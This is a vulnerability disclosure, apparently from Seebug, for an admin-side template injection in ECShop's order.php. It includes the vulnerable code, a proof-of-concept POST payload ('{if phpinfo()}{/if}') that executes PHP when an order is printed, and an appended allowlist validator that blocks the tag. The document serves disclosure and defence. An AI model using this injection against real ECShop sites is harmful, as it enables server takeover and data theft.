### Brief description:
ECSHOP admin back-end getshell
### Details:
```
// admin/order.php
elseif ($_REQUEST['act'] == 'edit_templates')
{
    /* Update the contents of the template file */
    $file_name = @fopen('../' . DATA_DIR . '/order_print.html', 'w+'); // writes the template out; as soon as anything renders this template, you get a shell
    echo '../' . DATA_DIR . '/order_print.html';
    echo stripslashes($_POST['FCKeditor1']);
    @fwrite($file_name, stripslashes($_POST['FCKeditor1']));
    @fclose($file_name);
    /* Status message */
    $link[] = array('text' => $_LANG['back_list'], 'href'=>'order.php?act=list');
    sys_msg($_LANG['edit_template_success'], 0, $link);
}
elseif ($_REQUEST['act'] == 'info')
{
    // ... (several lines omitted)
    assign_query_info();
    $smarty->display('order_info.htm');
}
}
```
### Proof of vulnerability:
First submit a request to

`127.0.0.1/ec/admin/order.php?act=edit_templates`

with the POST body

`FCKeditor1={if phpinfo()}{/if}`

Then view any order, click Print, and you get a shell.
![1.jpg](https://images.seebug.org/upload/201311/25213630416eaa7f6d1cc111c75f3079d224ccc8.jpg)

![2.jpg](https://images.seebug.org/upload/201311/2521364057a7247919a6635a0c2808e373143f24.jpg)

![3.jpg](https://images.seebug.org/upload/201311/2521380339b3f970a836667b056939fda2f6c7cf.jpg)
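
One way to close the hole at the write step, as an added example that is not ECShop's own code: validate the submitted `FCKeditor1` content against a tag allowlist before it reaches `order_print.html`. The function names, the allowlist and the temp-file path are assumptions, as is the premise (implied by the proof above) that the template engine evaluates expressions inside `{...}` tags as PHP.

```php
<?php
// Added example, not ECShop code: function names and the tag allowlist are assumptions.

/** Return every construct in $template that is not on the allowlist (empty = safe to store). */
function find_unsafe_template_tags(string $template): array
{
    // Variable reference such as $order or $order.order_sn; no calls, no modifiers.
    $var = '\$[A-Za-z_]\w*(?:\.\w+)*';
    $allowed = '#^(?:' . $var
        . '|if ' . $var . '(?: (?:eq|neq|gt|lt) (?:' . $var . '|\d+))?'
        . '|else|/if|/foreach'
        . '|foreach from=' . $var . ' item=[A-Za-z_]\w*'
        . ')$#';

    // Raw PHP open tags are never valid in a print template.
    preg_match_all('/<\?(?:php|=)?/i', $template, $m);
    $unsafe = $m[0];

    // Every single-line {...} span is treated as a tag and must match the allowlist.
    // Deliberately strict: one-line CSS rules in braces are rejected as well.
    preg_match_all('/\{([^{}\r\n]*)\}/', $template, $tags);
    foreach ($tags[1] as $i => $body) {
        if (!preg_match($allowed, trim($body))) {
            $unsafe[] = $tags[0][$i];
        }
    }
    return $unsafe;
}

/** Write the template only if it validates; return the rejected constructs otherwise. */
function save_order_print_template(string $path, string $submitted): array
{
    $unsafe = find_unsafe_template_tags($submitted);
    if ($unsafe === [] && file_put_contents($path, $submitted, LOCK_EX) === false) {
        throw new RuntimeException('cannot write ' . $path);
    }
    return $unsafe;
}

// Constructed inputs: the tag from the proof above and a benign order template.
$samples = [
    '{if phpinfo()}{/if}',
    '<td>{$order.order_sn}</td>{if $order.invoice_no}<b>{$order.invoice_no}</b>{/if}',
];
$target = sys_get_temp_dir() . '/order_print.html';   // stand-in for DATA_DIR
foreach ($samples as $s) {
    $rejected = save_order_print_template($target, $s);
    echo $rejected ? 'rejected: ' . implode(' ', $rejected) : 'stored', PHP_EOL;
}
```

In the `edit_templates` branch, the call would receive `stripslashes($_POST['FCKeditor1'])` and report the rejected tags through `sys_msg` instead of writing the file.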